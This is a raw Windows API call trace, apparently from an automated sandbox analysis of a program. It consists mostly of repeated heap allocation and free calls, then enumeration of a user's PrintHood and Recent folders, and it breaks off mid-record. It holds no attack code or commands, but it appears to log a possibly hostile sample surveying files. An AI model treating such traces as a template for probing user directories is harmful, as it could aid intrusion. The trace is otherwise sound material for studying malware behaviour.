hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.275] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\PrintHood\\") returned="PrintHood\\" [0195.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.276] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.276] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.277] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.277] PathFindFileNameW (pszPath="") returned="" [0195.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.277] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\PrintHood\\*" (normalized: "c:\\users\\keecfmwgj\\printhood\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9454bc60, ftCreationTime.dwHighDateTime=0x1d89abc, ftLastAccessTime.dwLowDateTime=0xd731c3e0, ftLastAccessTime.dwHighDateTime=0x1d8a217, ftLastWriteTime.dwLowDateTime=0xd731c3e0, ftLastWriteTime.dwHighDateTime=0x1d8a217, nFileSizeHigh=0x0, nFileSizeLow=0xc087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzmcSYQ7d6yY4Z.png", cAlternateFileName="ZZMCSY~1.PNG")) returned 0xffffffff [0195.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0195.279] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0195.279] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.282] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Recent\\") returned="Recent\\" [0195.282] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.283] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.283] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.283] PathFindFileNameW (pszPath="") returned="" [0195.283] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Recent\\*" (normalized: "c:\\users\\keecfmwgj\\recent\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9454bc60, ftCreationTime.dwHighDateTime=0x1d89abc, ftLastAccessTime.dwLowDateTime=0xd731c3e0, ftLastAccessTime.dwHighDateTime=0x1d8a217, 